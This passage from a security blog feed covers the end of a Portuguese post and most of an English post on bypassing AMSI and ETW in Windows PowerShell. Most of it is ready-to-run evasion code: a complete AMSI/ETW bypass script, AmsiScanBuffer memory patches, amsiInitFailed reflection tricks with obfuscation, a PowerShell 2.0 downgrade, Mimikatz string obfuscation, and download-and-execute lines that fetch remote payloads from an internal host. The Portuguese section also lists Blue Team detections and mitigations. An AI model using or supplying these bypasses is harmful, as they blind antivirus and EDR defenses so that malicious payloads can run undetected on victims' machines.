style="color:#7F848E;font-style:italic"># Desabilitar Script Block Logging (requer permissão ou bypass de CLM)</span></span> <span class="line"><span style="color:#E06C75">$key</span><span style="color:#56B6C2"> =</span><span style="color:#98C379"> 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'</span></span> <span class="line"><span style="color:#56B6C2">Set-ItemProperty</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Path </span><span style="color:#E06C75">$key</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Name </span><span style="color:#98C379">'EnableScriptBlockLogging'</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Value </span><span style="color:#D19A66">0</span></span></code></pre> <h2 id="script-completo-amsi--etw-bypass">Script Completo: AMSI + ETW Bypass</h2> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/usr/bin/env pwsh</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># amsi_etw_bypass.ps1 — AMSI + ETW neutralization</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Uso: . .\amsi_etw_bypass.ps1</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">function</span><span style="color:#61AFEF"> Invoke-AmsiBypass</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#C678DD"> try</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#E06C75"> $a</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Ref</span><span style="color:#ABB2BF">].Assembly.GetType(</span></span> <span class="line"><span style="color:#98C379"> 'System.Management.Automation.'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'Am'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'siUtils'</span></span> <span class="line"><span style="color:#ABB2BF"> )</span></span> <span class="line"><span style="color:#E06C75"> $b</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $a.GetField</span><span style="color:#ABB2BF">(</span><span style="color:#98C379">'am'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'siInit'</span><span style="color:#56B6C2"> +</span><span style="color:#98C379"> 'Failed'</span><span style="color:#ABB2BF">, </span><span style="color:#98C379">'NonPublic,Static'</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75"> $b.SetValue</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">$null</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">$true</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#56B6C2"> Write-Host</span><span style="color:#98C379"> "[+] AMSI : disabled"</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">ForegroundColor Green</span></span> <span class="line"><span style="color:#ABB2BF"> } </span><span style="color:#C678DD">catch</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#56B6C2"> Write-Host</span><span style="color:#98C379"> "[-] AMSI bypass failed: $_"</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">ForegroundColor Red</span></span> <span class="line"><span style="color:#ABB2BF"> }</span></span> <span class="line"><span style="color:#ABB2BF">}</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">function</span><span style="color:#61AFEF"> Invoke-ETWBypass</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#C678DD"> try</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#E06C75"> $patch</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Byte</span><span style="color:#ABB2BF">[]](</span><span style="color:#D19A66">0xC3</span><span style="color:#ABB2BF">) </span><span style="color:#7F848E;font-style:italic"># ret</span></span> <span class="line"><span style="color:#E06C75"> $addr</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">System.Diagnostics.Eventing.EventProvider</span><span style="color:#ABB2BF">].GetField(</span></span> <span class="line"><span style="color:#98C379"> 'm_etwCallback'</span><span style="color:#ABB2BF">,</span></span> <span class="line"><span style="color:#98C379"> 'NonPublic,Instance'</span></span> <span class="line"><span style="color:#ABB2BF"> )</span></span> <span class="line"><span style="color:#ABB2BF"> </span></span> <span class="line"><span style="color:#7F848E;font-style:italic"> # P/Invoke para VirtualProtect + patch EtwEventWrite</span></span> <span class="line"><span style="color:#E06C75"> $ntdll</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">System.Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]</span></span> <span class="line"><span style="color:#E06C75"> $kernel32</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> Add-Type</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">MemberDefinition </span><span style="color:#98C379">@'</span></span> <span class="line"><span style="color:#98C379">[DllImport("kernel32.dll")]</span></span> <span class="line"><span style="color:#98C379">public static extern bool VirtualProtect(</span></span> <span class="line"><span style="color:#98C379"> IntPtr lpAddress, UIntPtr dwSize,</span></span> <span class="line"><span style="color:#98C379"> uint flNewProtect, out uint lpflOldProtect);</span></span> <span class="line"><span style="color:#98C379">[DllImport("kernel32.dll")]</span></span> <span class="line"><span style="color:#98C379">public static extern IntPtr GetProcAddress(IntPtr h, string name);</span></span> <span class="line"><span style="color:#98C379">[DllImport("kernel32.dll")]</span></span> <span class="line"><span style="color:#98C379">public static extern IntPtr LoadLibrary(string name);</span></span> <span class="line"><span style="color:#98C379">'@</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Name </span><span style="color:#98C379">'K32'</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">PassThru</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75"> $lib</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $kernel32</span><span style="color:#ABB2BF">::LoadLibrary(</span><span style="color:#98C379">"ntdll.dll"</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75"> $func</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $kernel32</span><span style="color:#ABB2BF">::GetProcAddress(</span><span style="color:#E06C75">$lib</span><span style="color:#ABB2BF">, </span><span style="color:#98C379">"EtwEventWrite"</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75"> $old</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">uint32</span><span style="color:#ABB2BF">]</span><span style="color:#D19A66">0</span></span> <span class="line"><span style="color:#E06C75"> $kernel32</span><span style="color:#ABB2BF">::VirtualProtect(</span><span style="color:#E06C75">$func</span><span style="color:#ABB2BF">, [</span><span style="color:#C678DD">UIntPtr</span><span style="color:#ABB2BF">]</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x40</span><span style="color:#ABB2BF">, [</span><span style="color:#C678DD">ref</span><span style="color:#ABB2BF">]</span><span style="color:#E06C75">$old</span><span style="color:#ABB2BF">) | </span><span style="color:#56B6C2">Out-Null</span></span> <span class="line"><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">System.Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]::WriteByte(</span><span style="color:#E06C75">$func</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0xC3</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF"> </span></span> <span class="line"><span style="color:#56B6C2"> Write-Host</span><span style="color:#98C379"> "[+] ETW : patched"</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">ForegroundColor Green</span></span> <span class="line"><span style="color:#ABB2BF"> } </span><span style="color:#C678DD">catch</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#56B6C2"> Write-Host</span><span style="color:#98C379"> "[!] ETW bypass skipped: $_"</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">ForegroundColor Yellow</span></span> <span class="line"><span style="color:#ABB2BF"> }</span></span> <span class="line"><span style="color:#ABB2BF">}</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">Invoke-AmsiBypass</span></span> <span class="line"><span style="color:#56B6C2">Invoke-ETWBypass</span></span> <span class="line"><span style="color:#56B6C2">Write-Host</span><span style="color:#98C379"> "[*] Session ready. OPSEC level: reduced."</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">ForegroundColor Cyan</span></span></code></pre> <h2 id="detecção-pelo-lado-do-defensor">Detecção pelo Lado do Defensor</h2> <p>Se você é o Blue Team, monitore:</p> <ul> <li><strong>Event ID 4104</strong> — Script Block Logging (PowerShell)</li> <li><strong>Event ID 4688</strong> — Process creation com <code>powershell.exe -version 2</code></li> <li><strong>Sysmon Event 10</strong> — Process access a <code>amsi.dll</code></li> <li>Carregamento de <code>System.Management.Automation</code> via Reflection</li> <li>Presença de strings como <code>AmsiScanBuffer</code>, <code>amsiInitFailed</code>, <code>VirtualProtect</code> em logs</li> </ul> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Blue Team: verificar se AMSI está ativo na sessão</span></span> <span class="line"><span style="color:#ABB2BF">[</span><span style="color:#C678DD">Ref</span><span style="color:#ABB2BF">].Assembly.GetType(</span><span style="color:#98C379">'System.Management.Automation.AmsiUtils'</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF"> .GetField(</span><span style="color:#98C379">'amsiInitFailed'</span><span style="color:#ABB2BF">,</span><span style="color:#98C379">'NonPublic,Static'</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF"> .GetValue(</span><span style="color:#D19A66">$null</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># $false = AMSI ativo | $true = AMSI comprometido</span></span></code></pre> <h2 id="mitigações">Mitigações</h2> <ul> <li>Habilitar <strong>PowerShell Constrained Language Mode</strong> via WDAC/AppLocker</li> <li>Desabilitar <strong>PowerShell 2.0</strong> (<code>Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root</code>)</li> <li>Habilitar <strong>Script Block Logging</strong> e <strong>Module Logging</strong> (GPO)</li> <li>Usar <strong>EDR com proteção de memória</strong> (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint)</li> <li>Monitorar <strong>ETW providers</strong> para PowerShell: <code>Microsoft-Windows-PowerShell</code></li> <li>Implementar <strong>JEA (Just Enough Administration)</strong> para restringir comandos disponíveis</li> </ul> <h2 id="referências">Referências</h2> <ul> <li><a href="https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal">AMSI — Microsoft Docs</a></li> <li><a href="https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell">S3cur3Th1sSh1t/Amsi-Bypass-Powershell</a></li> <li>MITRE ATT&#x26;CK: <a href="https://attack.mitre.org/techniques/T1562/001/">T1562.001 — Impair Defenses: Disable or Modify Tools</a></li> </ul>redteam@kbmsecurity.com.brevasionamsipowershellevasionwindowsav-bypassreflectionpatchinghardAMSI Bypass — Disabling the Antimalware Scan Interface in PowerShellhttps://www.kbmsecurity.com.br/blog/post/amsi-bypass-powershell-en/https://www.kbmsecurity.com.br/blog/post/amsi-bypass-powershell-en/Techniques to bypass AMSI (Antimalware Scan Interface) on Windows and execute PowerShell payloads undetected by AV/EDR solutions.Mon, 10 Feb 2025 00:00:00 GMT<h2 id="what-is-amsi">What is AMSI?</h2> <p><strong>AMSI (Antimalware Scan Interface)</strong> is a Windows API introduced in Windows 10 that allows applications to send content to antivirus solutions for <strong>real-time</strong> scanning before execution.</p> <p>The flow works like this:</p> <ol> <li>PowerShell receives a script or command</li> <li>Before executing, it calls <code>AmsiScanBuffer()</code> or <code>AmsiScanString()</code> via <code>amsi.dll</code></li> <li>The registered AV/EDR scans the content</li> <li>If malicious → blocked. If clean → execution proceeds</li> </ol> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="plaintext"><code><span class="line"><span>PowerShell → amsi.dll → AmsiScanBuffer() → AV Provider → Allow / Block</span></span></code></pre> <p>Every PowerShell session loads <code>amsi.dll</code> into the process. The goal of bypasses is to neutralize this DLL <strong>before</strong> executing offensive payloads.</p> <p>> <strong>WARNING:</strong> These techniques are for use in authorized environments only (pentest, red team, lab). Unauthorized use is a crime.</p> <h2 id="technique-1--amsiscanbuffer-patch-via-reflection">Technique 1 — AmsiScanBuffer Patch via Reflection</h2> <p>The most classic technique: use .NET Reflection to locate and patch the <code>AmsiScanBuffer</code> function in memory, making it always return <code>AMSI_RESULT_CLEAN</code>.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># AMSI Patch via Reflection — classic</span></span> <span class="line"><span style="color:#E06C75">$Win32</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> @&#x26;quot;</span></span> <span class="line"><span style="color:#ABB2BF">using System;</span></span> <span class="line"><span style="color:#ABB2BF">using System.Runtime.InteropServices;</span></span> <span class="line"><span style="color:#ABB2BF">public </span><span style="color:#C678DD">class</span><span style="color:#61AFEF"> Win32</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">DllImport</span><span style="color:#ABB2BF">(&#x26;quot;kernel32&#x26;quot;)]</span></span> <span class="line"><span style="color:#ABB2BF"> public </span><span style="color:#C678DD">static</span><span style="color:#ABB2BF"> extern IntPtr GetProcAddress(IntPtr hModule, string procName);</span></span> <span class="line"><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">DllImport</span><span style="color:#ABB2BF">(&#x26;quot;kernel32&#x26;quot;)]</span></span> <span class="line"><span style="color:#ABB2BF"> public </span><span style="color:#C678DD">static</span><span style="color:#ABB2BF"> extern IntPtr LoadLibrary(string name);</span></span> <span class="line"><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">DllImport</span><span style="color:#ABB2BF">(&#x26;quot;kernel32&#x26;quot;)]</span></span> <span class="line"><span style="color:#ABB2BF"> public </span><span style="color:#C678DD">static</span><span style="color:#ABB2BF"> extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);</span></span> <span class="line"><span style="color:#ABB2BF">}</span></span> <span class="line"><span style="color:#ABB2BF">&#x26;quot;@</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">Add-Type</span><span style="color:#E06C75"> $Win32</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">$Lib</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Win32</span><span style="color:#ABB2BF">]::LoadLibrary(&#x26;quot;amsi.dll&#x26;quot;)</span></span> <span class="line"><span style="color:#E06C75">$Addr</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Win32</span><span style="color:#ABB2BF">]::GetProcAddress(</span><span style="color:#E06C75">$Lib</span><span style="color:#ABB2BF">, &#x26;quot;AmsiScanBuffer&#x26;quot;)</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Patch: mov eax, 0x80070057 ; ret</span></span> <span class="line"><span style="color:#E06C75">$Patch</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Byte</span><span style="color:#ABB2BF">[]](</span><span style="color:#D19A66">0xB8</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x57</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x00</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x07</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x80</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0xC3</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75">$Old</span><span style="color:#56B6C2"> =</span><span style="color:#D19A66"> 0</span></span> <span class="line"></span> <span class="line"><span style="color:#ABB2BF">[</span><span style="color:#C678DD">Win32</span><span style="color:#ABB2BF">]::VirtualProtect(</span><span style="color:#E06C75">$Addr</span><span style="color:#ABB2BF">, [</span><span style="color:#C678DD">UIntPtr</span><span style="color:#ABB2BF">]</span><span style="color:#D19A66">5</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0x40</span><span style="color:#ABB2BF">, [</span><span style="color:#C678DD">ref</span><span style="color:#ABB2BF">]</span><span style="color:#E06C75">$Old</span><span style="color:#ABB2BF">) | </span><span style="color:#56B6C2">Out-Null</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">$Marshal</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">System.Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]</span></span> <span class="line"><span style="color:#E06C75">$Marshal</span><span style="color:#ABB2BF">::Copy(</span><span style="color:#E06C75">$Patch</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">0</span><span style="color:#ABB2BF">, </span><span style="color:#E06C75">$Addr</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">6</span><span style="color:#ABB2BF">)</span></span></code></pre> <p>After running this in the session, AMSI is disabled for the current process.</p> <h2 id="technique-2--force-error-via-amsiinitfailed">Technique 2 — Force Error via AmsiInitFailed</h2> <p>A more stealthy approach: use Reflection to set the private field <code>amsiInitFailed</code> in the context of the current session, making PowerShell believe that AMSI failed to initialize.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># AmsiInitFailed — force initialization failure</span></span> <span class="line"><span style="color:#E06C75">$a</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Ref</span><span style="color:#ABB2BF">].Assembly.GetTypes() | </span><span style="color:#56B6C2">Where-Object</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#ABB2BF"> $_</span><span style="color:#E06C75">.Name</span><span style="color:#56B6C2"> -like</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;*Am*i*&#x26;#x27;</span></span> <span class="line"><span style="color:#ABB2BF">}</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">$b</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $a</span><span style="color:#ABB2BF"> | </span><span style="color:#56B6C2">ForEach-Object</span><span style="color:#ABB2BF"> {</span></span> <span class="line"><span style="color:#ABB2BF"> $_</span><span style="color:#E06C75">.GetFields</span><span style="color:#ABB2BF">(&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;NonPublic,Static&#x26;#x27;) | Where-Object {</span></span> <span class="line"><span style="color:#ABB2BF"> $_</span><span style="color:#E06C75">.Name</span><span style="color:#56B6C2"> -like</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;*ailed*&#x26;#x27;</span></span> <span class="line"><span style="color:#ABB2BF"> }</span></span> <span class="line"><span style="color:#ABB2BF">}</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">$b.SetValue</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">$null</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">$true</span><span style="color:#ABB2BF">)</span></span></code></pre> <p>This method is often detected by modern EDRs because the string <code>amsiInitFailed</code> has become a signature. Use obfuscation:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Obfuscated version with string concatenation</span></span> <span class="line"><span style="color:#E06C75">$x</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;Am&#x26;#x27; + &#x26;#x27;si&#x26;#x27; + &#x26;#x27;Utils&#x26;#x27;</span></span> <span class="line"><span style="color:#E06C75">$y</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;am&#x26;#x27; + &#x26;#x27;si&#x26;#x27; + &#x26;#x27;Init&#x26;#x27; + &#x26;#x27;Failed&#x26;#x27;</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">$t</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Ref</span><span style="color:#ABB2BF">].Assembly.GetType(&#x26;quot;System.Management.Automation.</span><span style="color:#E06C75">$x</span><span style="color:#ABB2BF">&#x26;quot;)</span></span> <span class="line"><span style="color:#E06C75">$f</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $t.GetField</span><span style="color:#ABB2BF">(</span><span style="color:#E06C75">$y</span><span style="color:#ABB2BF">, &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;NonPublic,Static&#x26;#x27;)</span></span> <span class="line"><span style="color:#E06C75">$f.SetValue</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">$null</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">$true</span><span style="color:#ABB2BF">)</span></span></code></pre> <h2 id="technique-3--patch-with-marshalwriteint32">Technique 3 — Patch with Marshal.WriteInt32</h2> <p>Variation of the direct patch, using <code>Marshal.WriteInt32</code> without needing custom P/Invoke:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Bypass via Marshal without Add-Type</span></span> <span class="line"><span style="color:#E06C75">$a</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">System.Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]</span></span> <span class="line"><span style="color:#E06C75">$b</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Ref</span><span style="color:#ABB2BF">].Assembly.GetType(&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;System.Management.Automation.AmsiUtils&#x26;#x27;)</span></span> <span class="line"><span style="color:#E06C75">$c</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $b.GetField</span><span style="color:#ABB2BF">(&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;amsiContext&#x26;#x27;, &#x26;#x27;NonPublic,Static&#x26;#x27;)</span></span> <span class="line"><span style="color:#E06C75">$d</span><span style="color:#56B6C2"> =</span><span style="color:#E06C75"> $c.GetValue</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">$null</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Corrupts the AMSI context</span></span> <span class="line"><span style="color:#E06C75">$a</span><span style="color:#ABB2BF">::WriteInt32([</span><span style="color:#C678DD">IntPtr</span><span style="color:#ABB2BF">](</span><span style="color:#E06C75">$d.ToInt64</span><span style="color:#ABB2BF">() </span><span style="color:#56B6C2">+</span><span style="color:#D19A66"> 0x8</span><span style="color:#ABB2BF">), </span><span style="color:#D19A66">0</span><span style="color:#ABB2BF">)</span></span></code></pre> <h2 id="technique-4--downgrade-to-powershell-20">Technique 4 — Downgrade to PowerShell 2.0</h2> <p>PowerShell 2.0 does not implement AMSI. If it is still installed on the system:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Checks if PS 2.0 is available</span></span> <span class="line"><span style="color:#ABB2BF">powershell </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">version </span><span style="color:#D19A66">2</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Command &#x26;quot;$PSVersionTable&#x26;quot;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Executes payload in PS 2.0 context (without AMSI)</span></span> <span class="line"><span style="color:#ABB2BF">powershell </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">version </span><span style="color:#D19A66">2</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">ExecutionPolicy Bypass </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">File payload.ps1</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Checks for .NET 2.0/3.5 installation (required for PS 2.0)</span></span> <span class="line"><span style="color:#56B6C2">Get-WindowsOptionalFeature</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Online </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">FeatureName MicrosoftWindowsPowerShellV2Root</span></span></code></pre> <p>> <strong>Note:</strong> Many modern environments have PS 2.0 disabled via GPO. Check before attempting.</p> <h2 id="technique-5--string-obfuscation-signature-evasion">Technique 5 — String Obfuscation (Signature Evasion)</h2> <p>Instead of patching AMSI, avoid triggering it. Strings known as <code>amsiInitFailed</code>, <code>AmsiScanBuffer</code>, <code>Invoke-Mimikatz</code> trigger signatures. Use obfuscation:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Simple concatenation</span></span> <span class="line"><span style="color:#E06C75">$cmd</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;Invoke&#x26;#x27; + &#x26;#x27;-&#x26;#x27; + &#x26;#x27;Mi&#x26;#x27; + &#x26;#x27;mi&#x26;#x27; + &#x26;#x27;katz&#x26;#x27;</span></span> <span class="line"><span style="color:#ABB2BF">IEX </span><span style="color:#E06C75">$cmd</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Base64 encoding</span></span> <span class="line"><span style="color:#E06C75">$encoded</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Convert</span><span style="color:#ABB2BF">]::ToBase64String([</span><span style="color:#C678DD">Text.Encoding</span><span style="color:#ABB2BF">]::Unicode.GetBytes(&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;Invoke-Mimikatz&#x26;#x27;))</span></span> <span class="line"><span style="color:#ABB2BF">IEX ([</span><span style="color:#C678DD">Text.Encoding</span><span style="color:#ABB2BF">]::Unicode.GetString([</span><span style="color:#C678DD">Convert</span><span style="color:#ABB2BF">]::FromBase64String(</span><span style="color:#E06C75">$encoded</span><span style="color:#ABB2BF">)))</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># SecureString (less common but effective)</span></span> <span class="line"><span style="color:#E06C75">$s</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;amsiInitFailed&#x26;#x27;</span></span> <span class="line"><span style="color:#E06C75">$secure</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> ConvertTo-SecureString</span><span style="color:#E06C75"> $s</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">AsPlainText </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">Force</span></span> <span class="line"><span style="color:#E06C75">$plain</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]::PtrToStringAuto(</span></span> <span class="line"><span style="color:#ABB2BF"> [</span><span style="color:#C678DD">Runtime.InteropServices.Marshal</span><span style="color:#ABB2BF">]::SecureStringToBSTR(</span><span style="color:#E06C75">$secure</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#ABB2BF">)</span></span></code></pre> <h2 id="technique-6--loading-via-webrequest-in-memory">Technique 6 — Loading via WebRequest (In-Memory)</h2> <p>Load payloads directly into memory without touching the disk, minimizing detection surface:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Bypass + in-memory loading</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># 1. Disable AMSI first</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># 2. Load remote assembly without writing to disk</span></span> <span class="line"></span> <span class="line"><span style="color:#ABB2BF">IEX (</span><span style="color:#56B6C2">New-Object</span><span style="color:#ABB2BF"> Net.WebClient).DownloadString(&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;http://192.168.1.10/bypass.ps1&#x26;#x27;)</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Or via IWR</span></span> <span class="line"><span style="color:#E06C75">$r</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> Invoke-WebRequest</span><span style="color:#56B6C2"> -</span><span style="color:#ABB2BF">Uri &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;http://192.168.1.10/payload.ps1&#x26;#x27; -UseBasicParsing</span></span> <span class="line"><span 